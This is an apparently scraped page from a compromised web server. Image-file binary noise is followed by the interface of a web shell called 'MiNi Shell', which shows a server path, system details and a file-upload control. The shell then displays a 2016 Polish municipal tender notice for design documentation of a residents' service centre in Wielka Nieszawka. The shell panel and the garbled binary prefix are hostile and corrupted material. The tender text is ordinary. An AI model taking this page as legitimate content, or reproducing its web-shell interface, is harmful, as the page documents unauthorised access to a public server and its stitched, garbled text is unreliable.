JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160502/109732-N-2016.html

<p class="kh_header"><b>Wielka Nieszawka: WYKONANIE KOMPLETNEJ DOKUMENTACJI PROJEKTOWEJ 
DLA ZADANIA INWESTYCYJNEGO PN. 
CENTRUM OBSŁUGI MIESZKAŃCÓW W WIELKIEJ NIESZAWCE</b><br>
<b>Numer ogłoszenia: 109732 - 2016; data zamieszczenia: 02.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Nieszawka , ul. Toruńska 12, 87-165 Wielka Nieszawka, woj. kujawsko-pomorskie, tel. 56 6781212, 6781093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.wielkanieszawka.lo.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE KOMPLETNEJ DOKUMENTACJI PROJEKTOWEJ 
DLA ZADANIA INWESTYCYJNEGO PN. 
CENTRUM OBSŁUGI MIESZKAŃCÓW W WIELKIEJ NIESZAWCE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:WYKONANIE KOMPLETNEJ DOKUMENTACJI PROJEKTOWEJ DLA ZADANIA INWESTYCYJNEGO PN. CENTRUM OBSŁUGI MIESZKAŃCÓW W WIELKIEJ NIESZAWCEPrzedmiotem zamówienia jest opracowanie wielobranżowych projektów budowlanych  i wykonawczych, wraz z uzyskaniem decyzji o pozwoleniu na budowę oraz nadzorem autorskim dla zadania inwestycyjnego pn. Centrum Obsługi Mieszkańców w Wielkiej Nieszawce, które będzie zrealizowane na działkach o numerach ewidencyjnych 113 i 114 obręb Wielka Nieszawka, wg poniższego programu:PROGRAM FUNKCJONALNY CENTRUM OBSŁUGI MIESZKAŃCÓW W WIELKIEJ NIESZAWCE,PARTER 1.Biuro podawcze wraz z kasą gminy oraz kancelaria ogólna- 18 m2-ilość pom.1,2.Pom Biurowe Radca Prawny-12 m2- 1pom.,3.Pom. Biurowe Sekretarz	20 m2-	1	-4.Pom. Kancelarii Tajnej-2 m2-	1 m pom.,5.Pom. Biurowe Dział Techniczny-18 m2-2 pom.,6.Pom. Biurowe Informatyk-12 m2-1 pom.,7.Serwerownia-10 m2-1 pom..8.Pom. Biurowe Referat Planowania i Inwestycji-18 m2-4 pom.,9.Pom. Biurowe Referat Oświaty-18 m2-2 pom.,10.Pom. Biurowe  Kierownik GOPS-15 m2-1 pom.,11.Pom. Biurowe sekretariat GOPS-15 m2-1 pom.,12.Pom. Biurowe Księgowa GOPS-15 m2-1 pom.,13.Pom. Biurowe Pracownicy GOPS-18 m2-4 pom.,14.Pom. Biurowe USC - Kierownik USC -15 m2-1 pom.,15.Pom. Sala Ślubów-50 m2-1 pom.,16.Zaplecze do sali ślubów -12 m2-1 pom.,17.Pomieszczenie Socjalne-18m2-1-Pom. Socjalne dla urzędników wraz ze zlewem ,zmywarką ,18.Sala kinowa ze sceną do występów wraz z zapleczem dla artystów teatralnych-150m2-1pom.-Sala bankietowa i kinowa oddzielona przesuwną ścianą każda mogąca pomieścić ok 140-150 osób, Sala bankietowa-150 m2-1 pom.,19.Szatnia -20 m2-1 pom.,20.Toalety do obsługi kompleksu sal-Damska męska i dla niepełnosprawnych,21.Toalety dla pracowników urzędu-Damska ,męska oraz dla niepełnosprawnych z przewijakiem,22.Kotłownia-1	pom.,23.Klatka schodowa24.Rozdzielnia-1 pom.,25.Hol główny,26.Pom. gospodarcze-1 pom.-ze zlewem technicznym,27.Pom. Magazynowe GOPS-60 m2-1 pom.-Z drzwiami od zewnątrz,28.Magazyn biurowy Urzędu-20 m2-1 pom.,29.Pom. magazynowe	20 m2	2 pom.,	30.PIĘTRO,31.Pom. Biurowe Wójta Gminy-30 m2-1 pom.-Gabinet z wejściem do pokoju narad i sekretariatu,32.Pom. Biurowe Wójta Gminy-30 m2	1 pom.	-Pokój narad, 33.Sekretariat przy Wójcie z zapleczem kuchennym-18 +10 m2-1 pom.	-Z przejściem do pokoju dyżurnego,34.Pom. Dyżurny zarządzania kryzysowego-18 m2-1 pom.,35.Pom. Biurowe Skarbnik-18 m2-1 pom.,36.Pom. Biurowe Referat Księgowości-18 m2-3 pom.,37.Pom. Biurowe -rezerwa -18 m2-3 pom.,38.Pom. socjalne-18 m2-1 pom.,Pom. Socjalne dla urzędników wraz ze zlewem ,zmywarką,39.Sala Rady Gminy	100 m2	1 pom.,	40.Zaplecze do Sali Rady Gminy-15 m2-1 pom.-z wejściem od Sali Rady ze zlewem i zmywarką,41.Pom. Biurowe  Biuro Rady Gminy-15 m2-1 pom.,42.Pom. Biurowe -Komisja Rady Gminy-18 m2-1 pom.,-43.Pom. Biurowe Przewodniczący Rady Gminy -15 m2-1 pom.,-44.Pom na Archiwa GOPS-40 m2-1pom,	45.Pom. Na Archiwum Urzędu-60m2-1pom.,	46.Toalety przy Sali Rady Gminy-15m2-	1pom.,47.Toalety dla urzędników-Damska  oraz męska,48.Pom. gospodarcze-1pom.-Ze zlewem technicznym,PODDASZE NIEUŻYTKOWE	--1.Dojazd do obiektu ulicą Jaśminową.2.Przewiduje się ogrzewanie gazowe.3.Należy przewidzieć wyposażenie obiektu w instalacje wewnętrzne zgodnie z aktualnymi możliwościami technicznymi.4.Obiekt musi spełniać wymogi dla osób niepełnosprawnych oraz posiadać windę osobową między kondygnacjami.5.Elewacja budynku powinna nawiązywać do obiektów architektury olenderskiej znajdującej się na terenie gminy.6.Poziom 0 budynku powinien być wyniesiony ponad teren zgodnie z zasadami tradycyjnego budownictwa olenderskiego.7.W poziomie parteru należy przewidzieć możliwość osobnego dostępu do pomieszczeń USC oraz GOPS wraz z toaletami, które mogłyby funkcjonować samodzielnie poza godzinami pracy Urzędu Gminy pamiętając ,że pracownik USC musi mieć zapewnioną komunikację z Urzędem w trakcie jego godzin pracy.Projekt powinien spełniać wymogi odpowiednich, obowiązujących przepisów, w szczególności warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie, BHP, P.poż., sanitarnych i być uzgodniony w tym zakresie.Koszty uzyskania wszelkich opinii, zezwoleń, uzgodnień i decyzji, których dotyczy przedmiot zamówienia ponosi Wykonawca. Wykonawca wg własnego wyboru, na własną odpowiedzialność i ryzyko, powinien obejrzeć lokalizację inwestycji w celu zgromadzenia wszelkich informacji, które mogą być niezbędne do prawidłowego przygotowania oferty. Przyjęte w projekcie materiały nie mogą być opisane przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i Projektant nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny i wykonawca wskaże kryteria równoważności.2. Wykaz opracowań wchodzących w skład przedmiotu umowy:1 wielobranżowy projekt budowlany zawierający wszystkie elementy projektu wykonawczego, w zakresie zapewniającym spełnienie wszystkich zakładanych funkcji obiektu - 6 kpl. w tym:-a.Branża architektoniczna wraz z kolorystyką-b.Branża konstrukcyjna,-c.Branża sanitarna w szczególności:  wod -kan, c.o. w tym projekt węzła cieplnego, c. w. u , kanalizacji deszczowej, wentylacji i klimatyzacji-d.Branża elektryczna  w szczególności: instalacje elektryczne, oświetleniowe, gniazd wtykowych, przeciwporażeniowych, tablic rozdzielczych, odgromowej, iluminacji zewnętrznej-e.Branża elektryczna niskoprądowa w szczególności: teletechniczna, komputerowa, nagłaśniająca, przeciwpożarowa, alarmowa-f.Projekt aranżacji wnętrz wraz z kolorystyką,-g.Projekt wyposażenia technicznego, technologicznego oraz pierwszego wyposażenia,-2 projekt zagospodarowania terenu w zakresie objętym projektem - 6 kpl. -3 informacja dotycząca bezpieczeństwa i ochrony zdrowia,-4 specyfikacja techniczna wykonania i odbioru robót budowlanych wszystkie branże - wersja elektroniczna format PDF + wersja edytowalna - 3 kpl.-5.przedmiar robót + wersja elektroniczna format pdf + ath - 1kpl.,-6. kosztorys inwestorski + wersja elektroniczna format PDF i ath - 1kpl.,-7.zbiorcze zestawienie całości kosztów inwestycji ZZK, w tym koszty wynikające m.in. z kosztorysów inwestorskich, kosztów wykonania dokumentacji projektowej, nadzorów inwestorskich i autorskich, umów przyłączeniowych, wyposażenia i innych - 1kpl.,-8 .inne opinie, badania, oceny, ekspertyzy, odwodnienia wykopów, rozwiązania kolizji, wynikające z otrzymanych warunków technicznych przyłączenia oraz niezbędne do spełnienia wszystkich zakładanych funkcji budynku i uzyskania pozwolenia na budowę oraz pozwolenia na użytkowanie obiektu,-9. dokumentacja projektowa także w wersji elektronicznej w formacie PDF i dwg.-3. Przedmiot umowy obejmuje ponadto:-1 uzyskanie decyzji o pozwoleniu na budowę,-2 jeżeli będą wymagane, uzyskanie warunków technicznych przyłączenia do infrastruktury technicznej od właściwych instytucji eksploatujących sieci (na podstawie  przygotowanych przez Wykonawcę stosownych wniosków z wymaganymi załącznikami do podpisu przez Zamawiającego,-3. wykonanie mapy ewidencyjnej terenu objętego projektowaną inwestycją wraz z wypisem z rejestru gruntów-4.przeniesienie na Zamawiającego praw autorskich majątkowych do wykonanej dokumentacji projektowej w zakresie objętym umową,-5. sprawowanie nadzoru autorskiego w trakcie realizacji inwestycji na podstawie dokumentacji projektowej objętej przedmiotem nin. umowy.-4. Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi w tym zakresie przepisami, warunkami technicznymi i normami, na podstawie oględzin terenu inwestycji, złożoną Zamawiającemu ofertą oraz niniejszą umową.-5. Opracowany przedmiot umowy powinien w szczególności:-1 spełniać wymogi odpowiednich, obowiązujących przepisów, w szczególności warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie, BHP, P.poż., sanitarnych i być uzgodniony w tym zakresie-2 posiadać komplet uzgodnień i pozwoleń wymaganych przepisami szczególnymi, a także uzgodnienie z użytkownikiem,-3 zawierać wszystkie niezbędne operaty, opinie, oceny, badania, ekspertyzy i inne niezbędne do prawidłowej realizacji prac projektowych i zapewniać możliwość wykonania robót i oddania obiektu do użytkowania.-6. Wykonawca oświadcza w projekcie, że wskazane w dokumentacji projektowej cechy techniczne i jakościowe materiałów, urządzeń i produktów stanowią kryterium równoważności tzn. realizator robót ma prawo do zastępowania ich materiałami, urządzeniami i  produktami nie gorszymi przy zachowaniu równorzędnych parametrów jakościowych i technicznych.-7. W trakcie trwania prac projektowych Wykonawca jest zobowiązany do przybycia i osobistej obecności w siedzibie Zamawiającego -w osobie właściwego projektanta lub osoby upoważnionej, posiadającej odpowiednia uprawnienia- drugiego dnia roboczego od powiadomienia przez Zamawiającego o takiej konieczności -za które uznaje się  dni od poniedziałku do piątku- z wyłączeniem dni wolnych od pracy w rozumieniu ustawy z dnia 18 stycznia 1951 r. o dniach wolnych od pracy. Zawiadomienie będzie wskazywać dzień i godzinę wymaganego przybycia.-8. Sprawowanie przez Wykonawcę czynności nadzoru autorskiego regulują postanowienia,     których mowa poniżej: -1.w ramach nadzoru autorskiego Wykonawca zobowiązuje się do realizacji czynności ustalonych ustawą Prawo budowlane, polegających w szczególności na:-a czuwaniu w toku realizacji inwestycji nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową,-b wyjaśnianiu wątpliwości powstałych w toku realizacji inwestycji,-c uzgadnianiu z Zamawiającym możliwości wprowadzeniu rozwiązań zamiennych  w stosunku do materiałów i konstrukcji przewidzianych w dokumentacji projektowej i dokonywaniu tych zmian,-d udziale w komisjach i naradach technicznych oraz uczestnictwie w odbiorze inwestycji,-2. Wykonawca lub osoby przez niego upoważnione zobowiązane są przybyć na plac budowy lub w inne wyznaczone miejsce min. 1 w miesiącu oraz jeśli zajdzie taka uzasadniona potrzeba to częściej na wniosek Zamawiającego.-3 sprawowanie nadzoru autorskiego nastąpi w ciągu 3 dni roboczych od zgłoszenia przez Zamawiającego -za które uznaje się  dni od poniedziałku do piątku- z wyłączeniem dni wolnych od pracy w rozumieniu ustawy z dnia 18 stycznia 1951 r. o dniach wolnych od pracy.-4. brak reakcji Wykonawcy na zgłoszenie Zamawiającego spowoduje naliczenie Wykonawcy kary umownej, o której mowa w par. 7 umowy.-5. wszelkie koszty związane ze sprawowaniem nadzoru autorskiego; tj. : koszty dojazdu, delegacje, koszty związane z noclegiem oraz inne nie zawarte w specyfikacji należy przewidzieć w ofercie.-Wykonawca  oświadcza, że posiada uprawnienia budowlane i należy do właściwej Izby Samorządu Zawodowego w rozumieniu przepisów art. 5 ust. 1 i 2 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz.U. z 2014 r., poz. 1946 z późn. zm.) oraz że wielobranżowy projekt będzie opracowany przez osoby posiadające adekwatne uprawnienia budowlane lub inne, należące do właściwej Izby Samorządu Zawodowego w rozumieniu przepisów art. 5 ust. 1 i 2 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa tekst jednolity: Dz.U. z 2014 r., poz. 1946 z późn. zm.-Koszty uzyskania wszelkich opinii, zezwoleń, uzgodnień i decyzji, których dotyczy przedmiot zamówienia ponosi Wykonawca. -Przyjęte w projekcie materiały nie mogą być opisane przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i Projektant nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy -lub równoważny i wykonawca wskaże kryteria równoważności-.-Zamawiający przekaże Wykonawcy mapę do celów projektowych ,wypis i wyrys z miejscowego planu zagospodarowania przestrzennego oraz dokumentację badań podłoża gruntowego i opinię geotechniczną.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.20.00-6, 71.24.80.00-8, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 2.000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca załączy wykaz wykonanej, a w przypadku świadczeń okresowych również wykonywanej usługi, polegającej na wykonaniu dokumentacji projektowej na budowę min. 1 budynku o kubaturze min 6000 m3 z co najmniej 20 pomieszczeniami hotelowymi/ biurowymi/ mieszkaniowymi/ usługowymi wewnątrz, wykonanej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału                   w postępowaniu w trybie art. 22 ust 1.
Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca przedstawi w ofercie wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału               w postępowaniu w trybie art. 22 ust 1.
Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

